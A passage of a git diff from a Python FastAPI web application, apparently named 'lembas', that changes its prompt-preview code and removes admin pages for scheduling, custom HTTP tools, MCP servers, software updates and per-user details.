The samples are gated exactly as `context_variables` gates the real values --
the agent block on the `agent` family, the schedule and helper blocks on the
situation rather than on any family, because neither is a tool. A preview
that admitted a fragment the real request would not is worse than one that
omitted it, so the gating is mirrored rather than approximated.
"""
from lembas.services.agent import policy
from lembas.services.library import memories as memories_service
from lembas.services.library import skills as skills_service
@@ -125,25 +67,13 @@ def _variables(
values.update(
{
"model_name": model_name,
"tool_names": _tool_names(db, families),
"tool_names": _tool_names(families),
"memories": memories_service.block(db, user) if "memory" in families else "",
"skills": skills_service.index_block(db, user) if "skills" in families else "",
"knowledge_bases": bases if "knowledge" in families else "",
"document_names": documents,
}
)
if "agent" in families:
values.update(SAMPLE_AGENT)
# A real one out of the table, not invented prose: this bullet *is* the
# mode guidance, so a made-up sentence here would preview wording that
# no request ever carries.
values["agent_mode"] = policy.MODE_GUIDANCE.get(mode, "") or policy.MODE_GUIDANCE[
policy.MODE_EDIT
]
if situation == SITUATION_TASK:
values.update(SAMPLE_SCHEDULE)
if situation == SITUATION_HELPER:
values["subagent"] = "yes"
return values
@@ -159,7 +89,7 @@ def _field_context(db: Db, key: str, *, value: str, overridden: bool) -> dict:
async def prompts_page(request: Request, db: Db, user: AdminUser, saved: bool = False):
stored = prompts_service.stored(db)
models = chat_service.available_models(db, user)
families = list(tools_service.families(db))
families = list(tools_service.FAMILIES)
return render(
request,
@@ -174,29 +104,18 @@ async def prompts_page(request: Request, db: Db, user: AdminUser, saved: bool =
"variables": prompts_service.VARIABLES,
# The legend shows what each name resolves to right now, with every
# family on -- a legend nobody can check is just a list of words.
# Every situation at once, unlike the preview: a chat is either a
# scheduled task or a helper and never both, but a legend is a
# reference rather than a rendering, and a name shown as empty
# because of the situation it was built in reads as a name that
# resolves to nothing.
"resolved": {
**_variables(
db,
user,
families=families,
model_name=models[0].label if models else "",
bases="Contracts, Recipes",
documents=SAMPLE_DOCUMENTS,
situation=SITUATION_TASK,
),
"subagent": "yes",
},
"resolved": _variables(
db,
user,
families=families,
model_name=models[0].label if models else "",
bases="Contracts, Recipes",
documents=SAMPLE_DOCUMENTS,
),
"models": models,
"families": families,
"situations": SITUATIONS,
"modes": policy.MODE_LABELS,
"registry": sorted(
tools_service.registry(db).values(), key=lambda t: (t.family, t.name)
tools_service.REGISTRY.values(), key=lambda t: (t.family, t.name)
),
"max_harness_chars": settings_store.get(
db, "max_harness_chars", key=settings_store.PROMPTS
@@ -245,12 +164,10 @@ async def preview(request: Request, db: Db, user: AdminUser):
"""
form = await request.form()
overrides = _submitted(db, form)
families = _families_of(db, [str(value) for value in form.getlist("preview_family")])
families = _families_of([str(value) for value in form.getlist("preview_family")])
model_name = str(form.get("preview_model") or "")
bases = str(form.get("preview_bases") or "").strip()
documents = str(form.get("preview_documents") or "").strip()
situation = str(form.get("preview_situation") or "")
mode = str(form.get("preview_mode") or "")
variables = _variables(
db,
@@ -259,8 +176,6 @@ async def preview(request: Request, db: Db, user: AdminUser):
model_name=model_name,
bases=bases,
documents=documents,
situation=situation,
mode=mode,
)
body = harness_service.compose_from(
db,
-76
View File
@@ -1,76 +0,0 @@
"""Scheduling administration: whether work may run on its own, and how much.
Everything here is clamped again in `settings_store.schedules` on the way out.
That is not belt and braces for its own sake: a value stored by an earlier
release, or edited into the database by hand, has to be survivable too, and the
same argument `agents` and `images` already make. What this page adds is telling
somebody *why* a number matters at the moment they change it.
"""
from __future__ import annotations
import logging
from fastapi import APIRouter, Form, Request, Response, status
from fastapi.responses import RedirectResponse
from sqlalchemy import func, select
from lembas.api.deps import AdminUser, Db
from lembas.db.models import Schedule
from lembas.services import settings_store
from lembas.web.templating import render
log = logging.getLogger(__name__)
router = APIRouter(prefix="/admin/schedules", tags=["admin-schedules"])
@router.get("")
async def schedules_page(request: Request, db: Db, user: AdminUser, saved: bool = False):
total = int(db.scalar(select(func.count()).select_from(Schedule)) or 0)
active = int(
db.scalar(
select(func.count()).select_from(Schedule).where(Schedule.enabled.is_(True))
)
or 0
)
return render(
request,
"admin/schedules.html",
{
"values": settings_store.schedules(db),
# Shown because turning the switch off does not delete anything, and
# an administrator who has just done so should be able to see what
# has stopped rather than infer it.
"total": total,
"active": active,
"saved": saved,
},
)
@router.post("")
async def save_schedules(
db: Db,
user: AdminUser,
enabled: bool = Form(False),
tick_seconds: int = Form(30),
max_per_user: int = Form(20),
max_concurrent: int = Form(3),
min_interval_seconds: int = Form(60),
max_queued: int = Form(3),
) -> Response:
settings_store.update(
db,
{
"enabled": enabled,
"tick_seconds": tick_seconds,
"max_per_user": max_per_user,
"max_concurrent": max_concurrent,
"min_interval_seconds": min_interval_seconds,
"max_queued": max_queued,
},
key=settings_store.SCHEDULES,
)
log.info("scheduling %s by %s", "enabled" if enabled else "disabled", user.email)
return RedirectResponse("/admin/schedules?saved=1", status_code=status.HTTP_303_SEE_OTHER)
-2
View File
@@ -57,7 +57,6 @@ async def save_search(
firecrawl_api_key: str = Form(""),
timeout: float = Form(20.0),
allow_private_fetch: bool = Form(False),
fetch_enabled: bool = Form(False),
) -> Response:
current = settings_store.search(db)
known = {p.key for p in search_service.PROVIDERS}
@@ -80,7 +79,6 @@ async def save_search(
),
"timeout": min(max(timeout, 5.0), 120.0),
"allow_private_fetch": allow_private_fetch,
"fetch_enabled": fetch_enabled,
},
key=settings_store.SEARCH,
)
-661
View File
@@ -1,661 +0,0 @@
"""Administration for the tools an administrator defines.
List-plus-detail, like `/admin/models` and for the same reason: a tool has
fifteen fields and a page that renders fifteen fields per row is unusable. The
list is compact and searchable; the whole form lives at `/admin/tools/{id}/edit`.
Validation reports back into the form rather than raising a 422. The fields here
are a JSON schema, a URL template and a secret; getting one wrong is normal, and
losing the other fourteen because of it is not acceptable. So a rejected save
re-renders the form from what was submitted, with the reason.
"""
from __future__ import annotations
import json
import logging
import re
from datetime import UTC, datetime
from fastapi import APIRouter, HTTPException, Request, Response, status
from fastapi.responses import RedirectResponse
from sqlalchemy import func, select
from lembas.api.deps import AdminUser, Db
from lembas.db.models import (
RESPONSE_JSON,
RESPONSE_MODES,
RESPONSE_RAW,
RESPONSE_TEXT,
SECRET_NONE,
SECRET_PLACEMENTS,
CustomTool,
Group,
McpServer,
)
from lembas.services import custom_tools
from lembas.services import prompts as prompts_service
from lembas.services import tools as tools_service
from lembas.services.crypto import UNCHANGED_SENTINEL, decrypt, keep_or_replace, mask
from lembas.services.fetch import FetchError, check_url
from lembas.services.mcp import client as mcp_client
from lembas.services.mcp import registry as mcp_registry
from lembas.web.templating import render
log = logging.getLogger(__name__)
router = APIRouter(tags=["admin-tools"])
PAGE_SIZE = 40
# The slug is the function name sent to the endpoint, so it is bound by the
# charset those accept, and it is half of this tool's prompt-fragment key, so it
# is bound by that pattern too. The intersection is this.
SLUG_PATTERN = re.compile(r"^[a-z0-9][a-z0-9_-]{0,47}$")
FILTERS: dict[str, tuple[str, object]] = {
"all": ("All", lambda t: True),
"enabled": ("Enabled", lambda t: t.enabled),
"disabled": ("Disabled", lambda t: not t.enabled),
"restricted": ("Restricted", lambda t: not t.public),
}
RESPONSE_LABELS = (
(RESPONSE_TEXT, "Text — HTML reduced to prose"),
(RESPONSE_JSON, "JSON — parsed, narrowed by the path below"),
(RESPONSE_RAW, "Raw — exactly as it arrived"),
)
SECRET_LABELS = (
(SECRET_NONE, "None — this endpoint needs no credential"),
("bearer", "Bearer token in a header"),
("header", "The header named below, verbatim"),
("query", "A query parameter named below"),
)
def _tool(db: Db, tool_id: str) -> CustomTool:
tool = db.get(CustomTool, tool_id)
if tool is None:
raise HTTPException(status.HTTP_404_NOT_FOUND, "That tool no longer exists.")
return tool
def _ordered(db: Db) -> list[CustomTool]:
return list(db.scalars(select(CustomTool).order_by(CustomTool.position, CustomTool.slug)))
def _back(message: str = "") -> Response:
target = f"/admin/tools?saved={message}" if message else "/admin/tools"
return RedirectResponse(target, status_code=status.HTTP_303_SEE_OTHER)
# --- Form <-> row ------------------------------------------------------------
def _headers_text(headers: dict) -> str:
return "\n".join(f"{name}: {value}" for name, value in (headers or {}).items())
def _parse_headers(text: str) -> dict[str, str]:
"""One `Name: value` per line. Blank lines and lines with no colon are dropped."""
out: dict[str, str] = {}
for line in (text or "").splitlines():
name, _, value = line.partition(":")
if name.strip() and _:
out[name.strip()] = value.strip()
return out
def _number(raw: str, *, default: int, low: int, high: int) -> int:
text = str(raw or "").strip()
if not text.lstrip("-").isdigit():
return default
return min(max(int(text), low), high)
def _populate(tool: CustomTool, form) -> None:
"""Copy a submitted form onto a row (or a draft of one).
Checkboxes are read by key presence: FastAPI cannot tell `x=` from an absent
`x`, and an absent one is exactly what an unticked box sends.
"""
tool.name = str(form.get("name") or "").strip()[:120]
tool.description = str(form.get("description") or "").strip()
tool.guidance = str(form.get("guidance") or "").replace("\r\n", "\n").strip()
tool.method = str(form.get("method") or "GET").strip().upper()
tool.url_template = str(form.get("url_template") or "").strip()[:1000]
tool.body_template = str(form.get("body_template") or "").replace("\r\n", "\n")
tool.headers_json = _parse_headers(str(form.get("headers") or ""))
placement = str(form.get("secret_placement") or SECRET_NONE)
tool.secret_placement = placement if placement in SECRET_PLACEMENTS else SECRET_NONE
tool.secret_name = str(form.get("secret_name") or "Authorization").strip()[:120]
mode = str(form.get("response_mode") or RESPONSE_TEXT)
tool.response_mode = mode if mode in RESPONSE_MODES else RESPONSE_TEXT
tool.response_path = str(form.get("response_path") or "").strip()[:300]
tool.max_chars = _number(
form.get("max_chars"),
default=8000,
low=custom_tools.MIN_CHARS,
high=custom_tools.MAX_CHARS,
)
tool.timeout = _number(
form.get("timeout"),
default=20,
low=custom_tools.MIN_TIMEOUT,
high=custom_tools.MAX_TIMEOUT,
)
tool.position = _number(form.get("position"), default=tool.position or 0, low=0, high=999)
tool.allow_private = "allow_private" in form
tool.enabled = "enabled" in form
tool.public = "public" in form
def _problem(db: Db, tool: CustomTool, form, *, existing_id: str = "") -> str:
"""Why this cannot be saved, or an empty string."""
if not tool.name:
return "A tool needs a name."
slug = str(form.get("slug") or "").strip().lower()
if not SLUG_PATTERN.match(slug):
return (
"The identifier must be lowercase letters, digits, hyphens or "
"underscores, start with a letter or digit, and be at most 48 "
"characters. It is the name the model calls."
)
if slug in tools_service.REGISTRY:
return f"{slug}” is the name of a built-in tool. Choose another."
clash = db.scalar(select(CustomTool).where(CustomTool.slug == slug))
if clash is not None and clash.id != existing_id:
return f"There is already a tool called “{slug}”."
tool.slug = slug
if tool.method not in custom_tools.ALLOWED_METHODS:
return f"{tool.method} is not a method this can send."
raw = str(form.get("parameters") or "").strip() or '{"type": "object", "properties": {}}'
try:
parameters = json.loads(raw)
except json.JSONDecodeError as exc:
return f"The parameters are not valid JSON: {exc}"
if not isinstance(parameters, dict) or parameters.get("type") != "object":
return 'The parameters must be a JSON object whose "type" is "object".'
tool.parameters_json = parameters
# The same check the runner makes, so a template that could never be called
# is refused here rather than at the first call.
try:
custom_tools.fill_url(custom_tools.spec_from(tool), {})
except Exception as exc: # noqa: BLE001 - any refusal is a message for the form
return str(getattr(exc, "message", exc))
return ""
def _detail(request: Request, db: Db, tool: CustomTool, *, is_new: bool, error: str = "", **extra):
key = f"tool.custom_{tool.slug}" if tool.slug else ""
return render(
request,
"admin/tool_detail.html",
{
"tool": tool,
"is_new": is_new,
"error": error,
"groups": list(db.scalars(select(Group).order_by(Group.name))),
"selected_groups": extra.pop(
"selected_groups", {group.id for group in (tool.groups if tool.id else [])}
),
"headers_text": extra.pop("headers_text", _headers_text(tool.headers_json)),
"parameters_text": extra.pop(
"parameters_text", json.dumps(tool.parameters_json or {}, indent=2)
),
"masked": mask(decrypt(tool.secret_encrypted)) if tool.secret_encrypted else "",
"unchanged": UNCHANGED_SENTINEL,
"methods": custom_tools.ALLOWED_METHODS,
"response_modes": RESPONSE_LABELS,
"secret_placements": SECRET_LABELS,
"prompt_key": key,
"prompt_overridden": key in prompts_service.stored(db),
**extra,
},
)
# --- The list ----------------------------------------------------------------
@router.get("/admin/tools")
async def tools_page(
request: Request,
db: Db,
user: AdminUser,
saved: str = "",
q: str = "",
filter: str = "all",
page: int = 1,
):
everything = _ordered(db)
predicate = FILTERS.get(filter, FILTERS["all"])[1]
needle = q.strip().lower()
matching = [
tool
for tool in everything
if predicate(tool)
and (not needle or needle in tool.slug.lower() or needle in (tool.name or "").lower())
]
pages = max(1, -(-len(matching) // PAGE_SIZE))
page = max(1, min(page, pages))
start = (page - 1) * PAGE_SIZE
return render(
request,
"admin/tools.html",
{
"tools": matching[start : start + PAGE_SIZE],
"total": len(everything),
"matched": len(matching),
"page": page,
"pages": pages,
"page_start": start,
"counts": {
key: sum(1 for tool in everything if rule(tool))
for key, (_label, rule) in FILTERS.items()
},
"filters": {key: label for key, (label, _rule) in FILTERS.items()},
"active_filter": filter if filter in FILTERS else "all",
"q": q,
"saved": saved,
},
)
# Registered before /{tool_id}: FastAPI matches in registration order, so with
# the parameterised route first "new" is captured as an id and the handler 404s
# on a tool that does not exist. This has already been a bug once, in
# /admin/models.
@router.get("/admin/tools/new")
async def new_tool_page(request: Request, db: Db, user: AdminUser):
draft = CustomTool(
name="",
slug="",
method="GET",
url_template="https://",
parameters_json={"type": "object", "properties": {}, "required": []},
secret_placement=SECRET_NONE,
response_mode=RESPONSE_TEXT,
max_chars=8000,
timeout=20,
enabled=True,
public=True,
position=0,
)
return _detail(request, db, draft, is_new=True)
@router.post("/admin/tools")
async def create_tool(request: Request, db: Db, user: AdminUser) -> Response:
form = await request.form()
draft = CustomTool(headers_json={}, parameters_json={})
_populate(draft, form)
draft.position = db.scalar(select(func.coalesce(func.max(CustomTool.position), -1))) + 1
problem = _problem(db, draft, form)
if problem:
return _detail(
request,
db,
draft,
is_new=True,
error=problem,
headers_text=str(form.get("headers") or ""),
parameters_text=str(form.get("parameters") or ""),
selected_groups=set(form.getlist("group_ids")),
)
draft.secret_encrypted = keep_or_replace(str(form.get("secret") or ""), "")
draft.groups = _chosen_groups(db, form, public=draft.public)
db.add(draft)
db.commit()
log.info("%s added custom tool %s", user.email, draft.slug)
return _back(f"Added {draft.name}.")
def _chosen_groups(db: Db, form, *, public: bool) -> list[Group]:
"""A public tool holds no groups, the way a public model holds none."""
if public:
return []
ids = set(form.getlist("group_ids"))
return list(db.scalars(select(Group).where(Group.id.in_(ids)))) if ids else []
@router.get("/admin/tools/{tool_id}/edit")
async def edit_tool_page(request: Request, db: Db, user: AdminUser, tool_id: str):
return _detail(request, db, _tool(db, tool_id), is_new=False)
@router.post("/admin/tools/{tool_id}/test")
async def test_tool(request: Request, db: Db, user: AdminUser, tool_id: str):
"""Call the stored row once, with arguments the administrator typed.
The stored row rather than the submitted form, so what is tested is what a
chat would actually do -- the same reason `/admin/search/test` reads the
saved provider settings.
"""
tool = _tool(db, tool_id)
form = await request.form()
raw = str(form.get("arguments") or "").strip() or "{}"
try:
arguments = json.loads(raw)
if not isinstance(arguments, dict):
raise ValueError("Arguments must be a JSON object.")
except (json.JSONDecodeError, ValueError) as exc:
return render(
request,
"admin/_tool_test.html",
{"tool": tool, "error": f"Those arguments are not a JSON object: {exc}"},
)
outcome = await custom_tools.call(custom_tools.spec_from(tool), arguments)
tool.last_error = str(outcome.event.get("error") or "")
tool.last_checked_at = datetime.now(UTC)
db.commit()
return render(
request,
"admin/_tool_test.html",
{
"tool": tool,
"outcome": outcome,
"error": outcome.event.get("error") or "",
"detail": outcome.event.get("detail") or "",
},
)
@router.post("/admin/tools/{tool_id}/delete")
async def delete_tool(db: Db, user: AdminUser, tool_id: str) -> Response:
tool = _tool(db, tool_id)
name = tool.name
db.delete(tool)
db.commit()
log.info("%s deleted custom tool %s", user.email, name)
return _back(f"Deleted {name}.")
@router.post("/admin/tools/{tool_id}")
async def update_tool(request: Request, db: Db, user: AdminUser, tool_id: str) -> Response:
tool = _tool(db, tool_id)
form = await request.form()
# Validated against a draft so that a rejected save leaves the stored row
# untouched and the form still holds what was typed.
draft = CustomTool(headers_json={}, parameters_json={}, position=tool.position)
_populate(draft, form)
problem = _problem(db, draft, form, existing_id=tool.id)
if problem:
draft.id = tool.id
draft.secret_encrypted = tool.secret_encrypted
return _detail(
request,
db,
draft,
is_new=False,
error=problem,
headers_text=str(form.get("headers") or ""),
parameters_text=str(form.get("parameters") or ""),
selected_groups=set(form.getlist("group_ids")),
)
_populate(tool, form)
tool.slug = draft.slug
tool.parameters_json = draft.parameters_json
tool.secret_encrypted = keep_or_replace(str(form.get("secret") or ""), tool.secret_encrypted)
tool.groups = _chosen_groups(db, form, public=tool.public)
db.commit()
log.info("%s updated custom tool %s", user.email, tool.slug)
return _back(f"Saved {tool.name}.")
# --- MCP servers -------------------------------------------------------------
MCP_SLUG_PATTERN = re.compile(r"^[a-z0-9][a-z0-9_-]{0,23}$")
def _server(db: Db, server_id: str) -> McpServer:
server = db.get(McpServer, server_id)
if server is None:
raise HTTPException(status.HTTP_404_NOT_FOUND, "That server no longer exists.")
return server
def _mcp_back(message: str = "") -> Response:
target = f"/admin/mcp?saved={message}" if message else "/admin/mcp"
return RedirectResponse(target, status_code=status.HTTP_303_SEE_OTHER)
def _populate_server(server: McpServer, form) -> None:
server.name = str(form.get("name") or "").strip()[:120]
server.url = str(form.get("url") or "").strip()[:1000]
server.guidance = str(form.get("guidance") or "").replace("\r\n", "\n").strip()
server.headers_json = _parse_headers(str(form.get("headers") or ""))
placement = str(form.get("secret_placement") or SECRET_NONE)
server.secret_placement = placement if placement in SECRET_PLACEMENTS else SECRET_NONE
server.secret_name = str(form.get("secret_name") or "Authorization").strip()[:120]
server.timeout = _number(
form.get("timeout"), default=30, low=mcp_client.MIN_TIMEOUT, high=mcp_client.MAX_TIMEOUT
)
server.max_chars = _number(
form.get("max_chars"), default=8000, low=mcp_client.MIN_CHARS, high=mcp_client.MAX_CHARS
)
server.position = _number(form.get("position"), default=server.position or 0, low=0, high=999)
server.allow_private = "allow_private" in form
server.enabled = "enabled" in form
server.public = "public" in form
# One checkbox per advertised tool, so an unticked one is absent. The
# stored map holds only the refusals; absent means on.
if "tool_choices" in form:
offered = set(form.getlist("tool_names"))
chosen = set(form.getlist("tool_names_on"))
server.tool_overrides_json = dict.fromkeys(offered - chosen, False)
def _server_problem(db: Db, server: McpServer, form, *, existing_id: str = "") -> str:
if not server.name:
return "A server needs a name."
slug = str(form.get("slug") or "").strip().lower()
if not MCP_SLUG_PATTERN.match(slug):
return (
"The identifier must be lowercase letters, digits, hyphens or "
"underscores, and at most 24 characters. It prefixes every tool "
"name this server offers."
)
clash = db.scalar(select(McpServer).where(McpServer.slug == slug))
if clash is not None and clash.id != existing_id:
return f"There is already a server called “{slug}”."
server.slug = slug
try:
check_url(server.url, allow_private=True)
except FetchError as exc:
return exc.message
return ""
def _server_detail(
request: Request, db: Db, server: McpServer, *, is_new: bool, error: str = "", **extra
):
key = f"tool.mcp_{server.slug}" if server.slug else ""
overrides = server.tool_overrides_json or {}
return render(
request,
"admin/mcp_detail.html",
{
"server": server,
"is_new": is_new,
"error": error,
"groups": list(db.scalars(select(Group).order_by(Group.name))),
"selected_groups": extra.pop(
"selected_groups", {group.id for group in (server.groups if server.id else [])}
),
"headers_text": extra.pop("headers_text", _headers_text(server.headers_json)),
"tools": [
{**entry, "on": overrides.get(entry.get("name"), True)}
for entry in (server.tools_json or [])
if isinstance(entry, dict)
],
"masked": mask(decrypt(server.secret_encrypted)) if server.secret_encrypted else "",
"unchanged": UNCHANGED_SENTINEL,
"secret_placements": SECRET_LABELS,
"prompt_key": key,
"prompt_overridden": key in prompts_service.stored(db),
**extra,
},
)
@router.get("/admin/mcp")
async def mcp_page(request: Request, db: Db, user: AdminUser, saved: str = ""):
servers = list(db.scalars(select(McpServer).order_by(McpServer.position, McpServer.slug)))
return render(
request,
"admin/mcp.html",
{
"servers": servers,
"counts": {server.id: len(server.tools_json or []) for server in servers},
"saved": saved,
},
)
# Registered before /{server_id}, for the reason given above.
@router.get("/admin/mcp/new")
async def new_server_page(request: Request, db: Db, user: AdminUser):
draft = McpServer(
name="",
slug="",
url="https://",
secret_placement=SECRET_NONE,
timeout=30,
max_chars=8000,
enabled=True,
public=True,
position=0,
tools_json=[],
tool_overrides_json={},
)
return _server_detail(request, db, draft, is_new=True)
@router.post("/admin/mcp")
async def create_server(request: Request, db: Db, user: AdminUser) -> Response:
form = await request.form()
draft = McpServer(headers_json={}, tools_json=[], tool_overrides_json={})
_populate_server(draft, form)
draft.position = db.scalar(select(func.coalesce(func.max(McpServer.position), -1))) + 1
problem = _server_problem(db, draft, form)
if problem:
return _server_detail(
request,
db,
draft,
is_new=True,
error=problem,
headers_text=str(form.get("headers") or ""),
selected_groups=set(form.getlist("group_ids")),
)
draft.secret_encrypted = keep_or_replace(str(form.get("secret") or ""), "")
draft.groups = _chosen_groups(db, form, public=draft.public)
db.add(draft)
db.commit()
# Discovered immediately, the way a new connection's models are: an
# administrator who has just typed a URL wants to know whether it answered.
count, error = await mcp_registry.refresh(db, draft)
log.info("%s added MCP server %s (%d tools)", user.email, draft.slug, count)
if error:
return _mcp_back(f"Added {draft.name}, but it could not be reached: {error}")
return _mcp_back(f"Added {draft.name}{count} tool(s).")
@router.get("/admin/mcp/{server_id}/edit")
async def edit_server_page(request: Request, db: Db, user: AdminUser, server_id: str):
return _server_detail(request, db, _server(db, server_id), is_new=False)
@router.post("/admin/mcp/{server_id}/test")
async def test_server(request: Request, db: Db, user: AdminUser, server_id: str):
"""Contact the server and cache what it advertises.
Returns the row fragment, swapped in place, exactly as "Test & refresh"
does for a connection.
"""
server = _server(db, server_id)
count, error = await mcp_registry.refresh(db, server)
message = (
f"{server.name}: {error}"
if error
else f"{server.name}: found {count} tool{'s' if count != 1 else ''}."
)
return render(
request,
"admin/_mcp_row.html",
{
"server": server,
"tool_count": len(server.tools_json or []),
"message": message,
"message_kind": "error" if error else "success",
},
)
@router.post("/admin/mcp/{server_id}/delete")
async def delete_server(db: Db, user: AdminUser, server_id: str) -> Response:
server = _server(db, server_id)
name = server.name
db.delete(server)
db.commit()
log.info("%s deleted MCP server %s", user.email, name)
return _mcp_back(f"Deleted {name}.")
@router.post("/admin/mcp/{server_id}")
async def update_server(request: Request, db: Db, user: AdminUser, server_id: str) -> Response:
server = _server(db, server_id)
form = await request.form()
draft = McpServer(headers_json={}, tools_json=[], position=server.position)
_populate_server(draft, form)
problem = _server_problem(db, draft, form, existing_id=server.id)
if problem:
draft.id = server.id
draft.secret_encrypted = server.secret_encrypted
draft.tools_json = server.tools_json
return _server_detail(
request,
db,
draft,
is_new=False,
error=problem,
headers_text=str(form.get("headers") or ""),
selected_groups=set(form.getlist("group_ids")),
)
_populate_server(server, form)
server.slug = draft.slug
server.secret_encrypted = keep_or_replace(
str(form.get("secret") or ""), server.secret_encrypted
)
server.groups = _chosen_groups(db, form, public=server.public)
db.commit()
log.info("%s updated MCP server %s", user.email, server.slug)
return _mcp_back(f"Saved {server.name}.")
-80
View File
@@ -1,80 +0,0 @@
"""What is running here, and getting to what is not.
Read `services/updates.py` first — the reason the button writes a file rather
than doing the work is there, and it is the whole design.
"""
from __future__ import annotations
import logging
from fastapi import APIRouter, Request, Response, status
from fastapi.responses import RedirectResponse
from lembas.api.deps import AdminUser, Db
from lembas.services import updates as updates_service
from lembas.web.templating import render
log = logging.getLogger(__name__)
router = APIRouter(prefix="/admin/updates", tags=["admin-updates"])
def _page(request: Request, state, saved: str = "") -> Response:
return render(
request,
"admin/updates.html",
{
"state": state,
"command": updates_service.manual_command(),
"saved": saved,
},
)
@router.get("")
async def updates_page(request: Request, db: Db, user: AdminUser, saved: str = ""):
"""No network on a page load.
`read(fetch=False)` compares against whatever the last fetch left behind, so
opening this is a few git reads off the local disk. A page that reached the
remote every time it was rendered would be one somebody stops opening.
"""
return _page(request, updates_service.read(), saved)
@router.post("/check")
async def check(request: Request, db: Db, user: AdminUser) -> Response:
"""Ask the remote what is there. The one place this touches the network."""
state = updates_service.read(fetch=True)
log.info("%s checked for updates", user.email)
return _page(request, state)
@router.post("/apply")
async def apply(db: Db, user: AdminUser) -> Response:
"""Write the request the helper is watching for.
Refused when the helper is not installed rather than written and left to sit
there: a file nothing is watching is a button that reports success and does
nothing, which is the failure this codebase keeps cataloguing.
"""
if not updates_service.helper_installed():
return RedirectResponse(
"/admin/updates?saved=The+update+helper+is+not+installed+on+this+host.",
status_code=status.HTTP_303_SEE_OTHER,
)
problem = updates_service.request_update(user.email)
message = problem or "Update requested. The service will restart in a moment."
return RedirectResponse(
f"/admin/updates?saved={message.replace(' ', '+')}",
status_code=status.HTTP_303_SEE_OTHER,
)
@router.post("/cancel")
async def cancel(db: Db, user: AdminUser) -> Response:
updates_service.clear_request()
return RedirectResponse(
"/admin/updates?saved=Request+withdrawn.", status_code=status.HTTP_303_SEE_OTHER
)
+12 -145
View File
@@ -10,23 +10,11 @@ from sqlalchemy import func, or_, select
from sqlalchemy.orm import Session as DBSession
from lembas.api.deps import AdminUser, Db
from lembas.db.models import (
PRINCIPAL_GROUP,
PRINCIPAL_USER,
ROLE_ADMIN,
ROLE_PENDING,
ROLE_USER,
Chat,
Group,
Model,
User,
)
from lembas.db.models import ROLE_ADMIN, ROLE_PENDING, ROLE_USER, Group, Model, User
from lembas.security import permissions
from lembas.security.passwords import hash_password, validate_password
from lembas.security.sessions import revoke_all_for_user
from lembas.services import chat as chat_service
from lembas.services import settings_store, sharing
from lembas.services import usage as usage_service
from lembas.services import settings_store
from lembas.web.templating import render
log = logging.getLogger(__name__)
@@ -66,71 +54,22 @@ def _would_orphan_the_instance(db: DBSession, user: User) -> bool:
# --- Users -------------------------------------------------------------------
# List plus detail, which is the shape this codebase already mandates for admin
# lists and the one `/admin/models` follows. The single page it replaces
# rendered a full form per account *and* a membership grid, and edited that
# membership from the opposite side to `/admin/groups` -- so a full-form POST
# from either overwrote what the other had just shown.
#
# Membership is now edited from **one** side, the group's. A user's page links
# to their groups and does not offer to change them, because two controls
# writing one value is how each becomes the answer to "why did my change not
# stick?".
PAGE_SIZE = 25
@router.get("/users")
async def users_page(
request: Request, db: Db, user: AdminUser, q: str = "", saved: str = "", page: int = 1
):
async def users_page(request: Request, db: Db, user: AdminUser, q: str = "", saved: str = ""):
query = select(User).order_by(User.created_at)
if q.strip():
pattern = f"%{q.strip()}%"
query = query.where(or_(User.name.ilike(pattern), User.email.ilike(pattern)))
total = db.scalar(select(func.count()).select_from(query.subquery())) or 0
pages = max(1, (total + PAGE_SIZE - 1) // PAGE_SIZE)
page = min(max(1, page), pages)
rows = list(db.scalars(query.offset((page - 1) * PAGE_SIZE).limit(PAGE_SIZE)))
return render(
request,
"admin/users.html",
{
"users": rows,
"usage": {row.id: usage_service.summary(db, row) for row in rows},
"users": list(db.scalars(query)),
"groups": list(db.scalars(select(Group).order_by(Group.name))),
"roles": ROLES,
"q": q,
"saved": saved,
"pager": {"page": page, "pages": pages, "total": total},
"admin_count": _admin_count(db),
},
)
@router.get("/users/{user_id}")
async def user_detail(request: Request, db: Db, user: AdminUser, user_id: str, saved: str = ""):
"""One account, and the answer to "what can this person actually do?".
That answer is `permissions.explain`, which is `resolve`'s working shown
rather than thrown away. Read-only on purpose: every one of those switches
is set somewhere else -- the baseline, or a named group -- and a control here
would be a third place to change one thing.
"""
target = _user(db, user_id)
return render(
request,
"admin/user_detail.html",
{
"target": target,
"roles": ROLES,
"explained": permissions.explain(db, target),
"permission_groups": permissions.permission_groups(),
"limits": permissions.limits_for(db, target),
"limit_defs": permissions.LIMIT_DEFS,
"usage": usage_service.summary(db, target),
"models": permissions.models_visible_to(db, target),
"saved": saved,
"admin_count": _admin_count(db),
},
)
@@ -175,13 +114,8 @@ async def update_user(
name: str = Form(...),
role: str = Form(ROLE_USER),
active: bool = Form(False),
group_ids: list[str] = Form(default=[]),
) -> Response:
"""Name, role and whether the account is active. **Not membership.**
That moved to the group's page. It used to be here as well, and a full-form
POST from either side overwrote whatever the other had -- two controls, one
value, and no answer to which one wins.
"""
target = _user(db, user_id)
losing_admin = target.role == ROLE_ADMIN and (role != ROLE_ADMIN or not active)
@@ -194,6 +128,7 @@ async def update_user(
target.name = name.strip()[:120] or target.name
target.role = role if role in ROLES else target.role
target.active = active
target.groups = list(db.scalars(select(Group).where(Group.id.in_(group_ids or []))))
# A deactivated or demoted user must lose their live sessions immediately,
# otherwise the change only takes effect when their cookie happens to expire.
@@ -202,9 +137,7 @@ async def update_user(
db.commit()
log.info("%s updated account %s (role=%s active=%s)", user.email, target.email, role, active)
return RedirectResponse(
f"/admin/users/{target.id}?saved=Saved+{target.email}.", status_code=303
)
return RedirectResponse(f"/admin/users?saved=Saved+{target.email}.", status_code=303)
@router.post("/users/{user_id}/password")
@@ -213,7 +146,7 @@ async def reset_password(
) -> Response:
target = _user(db, user_id)
if (problem := validate_password(password)) is not None:
return RedirectResponse(f"/admin/users/{user_id}?saved={problem}", status_code=303)
return RedirectResponse(f"/admin/users?saved={problem}", status_code=303)
target.password_hash = hash_password(password)
db.commit()
@@ -222,7 +155,7 @@ async def reset_password(
revoke_all_for_user(db, target)
log.info("%s reset the password for %s", user.email, target.email)
return RedirectResponse(
f"/admin/users/{target.id}?saved=Password+reset.+Sessions+revoked.",
f"/admin/users?saved=Password+reset+for+{target.email}.+Sessions+revoked.",
status_code=303,
)
@@ -242,20 +175,6 @@ async def delete_user(db: Db, user: AdminUser, user_id: str) -> Response:
email = target.email
# Chats and folders cascade; that is the point of deleting an account.
#
# Shares do not, and never did. `Share.principal_id` and
# `Share.resource_id` both point at one of several tables depending on a
# sibling column, which SQLite cannot express as a foreign key -- so a
# deleted account left behind every grant *to* it and every grant *of* its
# own work. Both halves, and both before the delete, while the rows are
# still there to be found.
sharing.forget_owner(db, target.id)
